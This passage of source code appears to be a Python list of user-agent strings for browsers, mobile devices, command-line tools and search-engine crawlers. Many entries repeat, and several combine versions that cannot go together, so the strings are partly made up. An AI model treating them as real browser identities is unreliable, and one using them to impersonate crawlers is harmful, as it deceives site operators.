'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)',
'Links (2.1pre15; FreeBSD 5.4-STABLE i386; 158x58)', 'Wget/1.8.2',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.0', 'Mediapartners-Google/2.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.5) Gecko/20031007 Firebird/0.7',
'Mozilla/4.04 [en] (WinNT; I)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20060205 Galeon/2.0.0 (Debian package 2.0.0-2)',
'lwp-trivial/1.41', 'NetBSD-ftp/20031210', 'Dillo/0.8.5-i18n-misc',
'Links (2.1pre20; NetBSD 2.1_STABLE i386; 145x54)',
'Lynx/2.8.5rel.5 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d',
'Lynx/2.8.5rel.3 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d',
'Links (2.1pre19; NetBSD 2.1_STABLE sparc64; 145x54)',
'Lynx/2.8.6dev.15 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d',
'Links (2.1pre14; IRIX64 6.5 IP27; 145x54)', 'Wget/1.10.1',
'ELinks/0.10.5 (textmode; FreeBSD 4.11-STABLE i386; 80x22-2)',
'Links (2.1pre20; FreeBSD 4.11-STABLE i386; 80x22)',
'Lynx/2.8.5rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d-p1', 'Opera/8.52 (X11; Linux i386; U; de)',
'Mozilla/5.0 (X11; U; NetBSD i386; en-US; rv:1.8.0.1) Gecko/20060310 Firefox/1.5.0.1',
'Mozilla/5.0 (X11; U; IRIX64 IP27; en-US; rv:1.4) Gecko/20030711',
'Mozilla/4.8 [en] (X11; U; IRIX64 6.5 IP27)', 'Mozilla/4.76 [en] (X11; U; SunOS 5.8 sun4m)',
'Opera/5.0 (SunOS 5.8 sun4m; U) [en]', 'Links (2.1pre15; SunOS 5.8 sun4m; 80x24)',
'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d', 'Wget/1.8.1', 'Wget/1.9.1',
'tnftp/20050625', 'Links (1.00pre12; Linux 2.6.14.2.20051115 i686; 80x24) (Debian pkg 0.99+1.00pre12-1)',
'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.0.16',
'Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.7) Gecko/20051122', 'Wget/1.7',
'Lynx/2.8.2rel.1 libwww-FM/2.14', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; de) Opera 8.53',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7e',
